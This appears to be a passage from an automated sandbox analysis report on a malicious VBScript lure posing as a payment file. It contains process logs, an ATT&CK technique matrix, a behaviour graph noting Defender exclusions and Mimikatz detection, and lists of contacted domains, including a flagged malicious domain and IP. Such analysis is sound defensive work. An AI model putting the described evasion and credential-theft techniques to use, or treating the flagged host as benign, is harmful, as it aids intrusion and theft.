Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts1
Exploitation for Client Execution		221
Scripting		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32		Cached Domain Credentials22
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1617734 Sample: Payment_Activity_0079_2025-... Startdate: 18/02/2025 Architecture: WINDOWS Score: 100 60 xspacet.wiki 2->60 62 fg.microsoft.map.fastly.net 2->62 64 2 other IPs or domains 2->64 76 Suricata IDS alerts for network traffic 2->76 78 Sample has a suspicious name (potential lure to open the executable) 2->78 80 Sigma detected: HackTool - Mimikatz Execution 2->80 82 4 other signatures 2->82 10 wscript.exe 1 2->10         started        13 svchost.exe 2->13         started        signatures3 process4 signatures5 86 VBScript performs obfuscated calls to suspicious functions 10->86 88 Wscript starts Powershell (via cmd or directly) 10->88 90 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->90 92 2 other signatures 10->92 15 cmd.exe 1 10->15         started        18 cmd.exe 10->18         started        20 cmd.exe 10->20         started        22 5 other processes 10->22 process6 signatures7 96 Suspicious powershell command line found 15->96 98 Wscript starts Powershell (via cmd or directly) 15->98 100 Adds a directory exclusion to Windows Defender 15->100 24 powershell.exe 26 15->24         started        27 conhost.exe 15->27         started        29 powershell.exe 18->29         started        31 conhost.exe 18->31         started        33 conhost.exe 20->33         started        35 powershell.exe 20->35         started        37 control.exe 22->37         started        39 conhost.exe 22->39         started        41 7 other processes 22->41 process8 signatures9 84 Loading BitLocker PowerShell Module 24->84 43 msedge.exe 113 506 24->43         started        47 WmiPrvSE.exe 29->47         started        49 rundll32.exe 37->49         started        process10 dnsIp11 72 192.168.2.10, 443, 49736, 49748 unknown unknown 43->72 74 239.255.255.250 unknown Reserved 43->74 94 Suspicious powershell command line found 43->94 51 msedge.exe 43->51         started        54 msedge.exe 43->54         started        56 msedge.exe 43->56         started        58 2 other processes 43->58 signatures12 process13 dnsIp14 66 xspacet.wiki 51->66 68 edge.gycpi.b.yahoodns.net 87.248.119.251, 443, 49812 YAHOO-DEBDE United Kingdom 51->68 70 138 other IPs or domains 51->70

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Payment_Activity_0079_2025-2-17.vbs5%VirustotalBrowse
Payment_Activity_0079_2025-2-17.vbs0%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://scribd.comtsv100%Avira URL Cloudsafe
https://panel-api.survicate.com/_/report_csp/survey0%Avira URL Cloudsafe
https://scribd.comreceive-cookie-deprecation/M70%Avira URL Cloudsafe
https://scribd.comkhaos_pv10p0%Avira URL Cloudsafe
https://scribd.comts/Q0%Avira URL Cloudsafe
https://ids4.ad.gt/api/v1/ip_match?id=AU1D-0100-001739863021-EHT1L4CA-5M760%Avira URL Cloudsafe
https://scribd.comXANDR_PANIDv100%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
172.64.41.3
truefalse
    		high
    d2fashanjl7d9f.cloudfront.net
    		18.66.102.121
    		truefalse
      		high
      api.btloader.com
      		130.211.23.194
      		truefalse
        		high
        a416.dscd.akamai.net
        		2.19.11.120
        		truefalse
          		high
          global.px.quantserve.com
          		91.228.74.159
          		truefalse
            		high
            a.pub.network
            		104.18.20.206
            		truefalse
              		high
              platform.twitter.map.fastly.net
              		146.75.120.157
              		truefalse
                		high
                scontent.xx.fbcdn.net
                		157.240.251.9
                		truefalse
                  		high
                  e35058.api11.akamaiedge.net
                  		104.115.82.11
                  		truefalse
                    		high
                    utt.impactcdn.com
                    		35.186.249.72
                    		truefalse
                      		high
                      confiant-integrations.global.ssl.fastly.net
                      		151.101.1.194
                      		truefalse
                        		high
                        xspacet.wiki
                        		185.39.18.56
                        		truetrue
                          		unknown
                          cdn.pdst.fm
                          		35.244.142.80
                          		truefalse
                            		high
                            www.google.com
                            		216.58.206.68
                            		truefalse
                              		high
                              scribd.map.fastly.net
                              		151.101.2.152
                              		truefalse
                                		high
                                s.amazon-adsystem.com
                                		98.82.156.207
                                		truefalse
                                  		high
                                  ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                  		94.245.104.56
                                  		truefalse
                                    		high
                                    detgh1asa1dg4.cloudfront.net
                                    		3.167.227.110
                                    		truefalse
                                      		high
                                      ax-0001.ax-msedge.net
                                      		150.171.27.10
                                      		truefalse
                                        		high
                                        d1ykf07e75w7ss.cloudfront.net
                                        		52.222.217.112
                                        		truefalse
                                          		high
                                          stripecdn.map.fastly.net
                                          		151.101.192.176
                                          		truefalse
                                            		high
                                            d.pub.network
                                            		34.160.152.31
                                            		truefalse
                                              		high
                                              fg.microsoft.map.fastly.net
                                              		199.232.214.172
                                              		truefalse
                                                		high
                                                dualstack.reddit.map.fastly.net
                                                		151.101.193.140
                                                		truefalse
                                                  		high
                                                  c.pub.network
                                                  		34.160.152.31
                                                  		truefalse
                                                    		high
                                                    prdsurvey.b-cdn.net
                                                    		169.150.236.100
                                                    		truefalse
                                                      		high
                                                      d2gt2ux04o03l1.cloudfront.net
                                                      		18.245.31.35
                                                      		truefalse
                                                        		high
                                                        btloader.com
                                                        		104.22.75.216
                                                        		truefalse
                                                          		high
                                                          edge.gycpi.b.yahoodns.net
                                                          		87.248.119.251
                                                          		truefalse
                                                            		high
                                                            static.ads-twitter.com
                                                            		unknown
                                                            		unknownfalse
                                                              		high
                                                              cmp.quantcast.com
                                                              		unknown
                                                              		unknownfalse
                                                                		high
                                                                b.pub.network
                                                                		unknown
                                                                		unknownfalse
                                                                  		high
                                                                  rules.quantcount.com
                                                                  		unknown
                                                                  		unknownfalse
                                                                    		high
                                                                    www.redditstatic.com
                                                                    		unknown
                                                                    		unknownfalse
                                                                      		high
                                                                      c.amazon-adsystem.com
                                                                      		unknown
                                                                      		unknownfalse
                                                                        		high
                                                                        secure.quantserve.com
                                                                        		unknown
                                                                        		unknownfalse
                                                                          		high
                                                                          pixel.quantserve.com
                                                                          		unknown
                                                                          		unknownfalse
                                                                            		high
                                                                            b-code.liadm.com
                                                                            		unknown
                                                                            		unknownfalse
                                                                              		high
                                                                              connect.facebook.net
                                                                              		unknown
                                                                              		unknownfalse
                                                                                		high
                                                                                cmp.osano.com
                                                                                		unknown
                                                                                		unknownfalse
                                                                                  		high
                                                                                  s-f.scribdassets.com
                                                                                  		unknown
                                                                                  		unknownfalse
                                                                                    		high
                                                                                    s.yimg.com
                                                                                    		unknown
                                                                                    		unknownfalse
                                                                                      		high
                                                                                      bzib.nelreports.net
                                                                                      		unknown
                                                                                      		unknownfalse
                                                                                        		high
                                                                                        html.scribdassets.com
                                                                                        		unknown
                                                                                        		unknownfalse
                                                                                          		high
                                                                                          survey.survicate.com
                                                                                          		unknown
                                                                                          		unknownfalse
                                                                                            		high
                                                                                            analytics.tiktok.com
                                                                                            		unknown
                                                                                            		unknownfalse
                                                                                              		high
                                                                                              www.scribd.com
                                                                                              		unknown
                                                                                              		unknownfalse
                                                                                                		high
                                                                                                js.stripe.com
                                                                                                		unknown
                                                                                                		unknownfalse
                                                                                                  		high

                                                                                                  Contacted URLs

                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                  https://match.adsrvr.org/track/cmf/generic?ttd_pid=8gkxb6n&ttd_tpi=1&ttd_puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0false
                                                                                                    		high
                                                                                                    https://secure-assets.rubiconproject.com/utils/xapi/multi-sync.html?endpoint=us-east&p=rise_engagefalse
                                                                                                      		high
                                                                                                      https://token.rubiconproject.com/token?pid=50242&puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0false
                                                                                                        		high
                                                                                                        https://cdn.id5-sync.com/api/1.0/id5-api.jsfalse
                                                                                                          		high
                                                                                                          https://secure.adnxs.com/getuid?https://ids.ad.gt/api/v1/match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&adnxs_id=$UID&gdpr=0false
                                                                                                            		high
                                                                                                            https://image8.pubmatic.com/AdServer/ImgSync?p=159706&gdpr=0&gdpr_consent=&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUIDfalse
                                                                                                              		high
                                                                                                              https://cs-server-s2s.yellowblue.io/cs?fwrd=1&aid=11580&puid=213023946785716false
                                                                                                                		high
                                                                                                                https://prebid-match.dotomi.com/match/bounce/current?DotomiTest=29ded5403b8504a3&is_secure=true&version=1&networkId=72582&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D90%26gdpr%3D0%26gdpr_consent%3D%26uid%3Dfalse
                                                                                                                  		high
                                                                                                                  https://clients2.googleusercontent.com/crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crxfalse
                                                                                                                    		high
                                                                                                                    https://www.scribd.com/document/806838445/Bank-Statementfalse
                                                                                                                      		high
                                                                                                                      https://creativecdn.com/cm-notify?pi=risefalse
                                                                                                                        		high
                                                                                                                        https://ad-delivery.net/px.gif?ch=2false
                                                                                                                          		high
                                                                                                                          https://p.rfihub.com/cm?pub=39342&in=1&userid=9fa5f896-689e-4e02-892e-586e4b3d39e8%3A1739863015.260034&forward=https%3A//i.liadm.com/s/56409%3Fbidder_id%3D200442%26bidder_uuid%3D9fa5f896-689e-4e02-892e-586e4b3d39e8%253A1739863015.260034%26pid%3D500040%26it%3D1%26iv%3D9fa5f896-689e-4e02-892e-586e4b3d39e8%253A1739863015.260034%26_%3D1739863015.2620804&cb=1739863015.2621722false
                                                                                                                            		high
                                                                                                                            https://pixel.tapad.com/idsync/ex/receive?partner_id=3185&partner_device_id=AU1D-0100-001739863021-EHT1L4CA-5M76&partner_url=https://ids.ad.gt%2Fapi%2Fv1%2Ftapad_match%3Fid%3DAU1D-0100-001739863021-EHT1L4CA-5M76%26tapad_id%3D%24%7BTA_DEVICE_ID%7Dfalse
                                                                                                                              		high
                                                                                                                              https://alb.reddit.com/rp.gif?ts=1739863011367&id=t2_9t33vcn2&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=3db7dcde-f710-4d9a-a231-37baf4e66c84&aaid=&em=&external_id=&idfa=&integration=reddit&partner=&opt_out=0&sh=1280&sw=1024&v=rdt_4a8557f4&dpm=&dpcc=&dprc=false
                                                                                                                                		high
                                                                                                                                https://ib.adnxs.com/getuid?https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D105%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3Dfalse
                                                                                                                                  		high
                                                                                                                                  https://p.ad.gt/api/v1/eventfalse
                                                                                                                                    		high
                                                                                                                                    https://ads.stickyadstv.com/user-matching?gdpr=0&gdpr_consent=&id=3663false
                                                                                                                                      		high
                                                                                                                                      https://www.redditstatic.com/ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetryfalse
                                                                                                                                        		high
                                                                                                                                        https://cm.adform.net/cookie?redirect_url=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D143%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3Dfalse
                                                                                                                                          		high
                                                                                                                                          https://ids.ad.gt/api/v1/amo_match?turn_id=2883371875300828767&id=AU1D-0100-001739863021-EHT1L4CA-5M76false
                                                                                                                                            		high
                                                                                                                                            https://us-u.openx.net/w/1.0/cm?gdpr=0&gdpr_consent=&id=58ceaaf5-c766-4c17-869a-d76e43401714&r=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11563%26id%3Dfalse
                                                                                                                                              		high
                                                                                                                                              https://ads.pubmatic.com/AdServer/js/user_sync.html?kdntuid=1&p=156696false
                                                                                                                                                		high
                                                                                                                                                https://imgv2-2-f.scribdassets.com/img/document/681488845/149x198/c7ddc062e9/1716802451?v=12false
                                                                                                                                                  		high
                                                                                                                                                  https://ap.lijit.com/pixel?&redir=https%3A%2F%2Fsync.adkernel.com%2Fuser-sync%3Fzone%3D176971%26dsp%3D763610%26t%3Dimage%26uid%3D%24UID&sovrn_retry=truefalse
                                                                                                                                                    		high
                                                                                                                                                    https://cdn.btmessage.com/webfonts43j533.jsfalse
                                                                                                                                                      		high
                                                                                                                                                      https://visitor-risecode.omnitagjs.com/visitor/bsync?name=risecode&uid=40a3c28f9ffc73ee86df2bac2d2bb390&url=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11609%26id%3D%5BBUYER_ID%5D%0Afalse
                                                                                                                                                        		high
                                                                                                                                                        https://sync.ingage.tech/?gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D154%26advUuid%3D%24UID%26gdpr%3D0%26gdpr_consent%3D%26us_privacy%3Dfalse
                                                                                                                                                          		high
                                                                                                                                                          https://cs-server-s2s.yellowblue.io/cs?fwrd=1&aid=11571&id=88d7ae9b-757d-4195-ad7d-f0171149038f&gdpr_consent=null&gdpr=0false
                                                                                                                                                            		high
                                                                                                                                                            https://x.bidswitch.net/ul_cb/check_uuid/https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Faid%3D11603%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D$%7BBSW_UUID%7Dfalse
                                                                                                                                                              		high
                                                                                                                                                              https://html.scribdassets.com/9mqqvt5eyodq34so/fonts/0004.woff2false
                                                                                                                                                                		high
                                                                                                                                                                https://cdn.hadronid.net/hadron.js?url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ref=&_it=freestar&partner_id=474&ha=_hadronfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://match.adsrvr.org/track/cmf/generic?ttd_pid=bidswitch&ttd_tpi=1&ttd_puid=onetag&gdpr=0&gdpr_consent=false
                                                                                                                                                                    		high
                                                                                                                                                                    https://sync.1rx.io/usersync2/rmpssp?sub=zeta&gdpr=0&gdpr_consent=&us_privacy=&redir=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D37%26buyeruid%3D%5BRX_UUID%5D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgBfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://analytics.tiktok.com/i18n/pixel/events.js?sdkid=C8LT3611P6OF1JAH7LT0&lib=ttqfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://freestar-io.videoplayerhub.com/gallery.jsfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://imgv2-2-f.scribdassets.com/img/document/684989787/149x198/3d21e84e60/1710549657?v=12false
                                                                                                                                                                            		high
                                                                                                                                                                            https://fid.agkn.com/f?apiKey=2111098132&r=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statementfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://token.rubiconproject.com/khaos.json?false
                                                                                                                                                                                		high
                                                                                                                                                                                https://eb2.3lift.com/getuid?ld=1&gdpr=0&cmp_cs=&us_privacy=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D121%26advUuid%3D%24UIDfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://api.btmessage.com/websiteconfig?bt_env=prod&o=5714937848528896&w=scribd.com&l=ENfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://s-f.scribdassets.com/webpack/monolith/8260.0186aa9e3e0089f26ff6.cssfalse
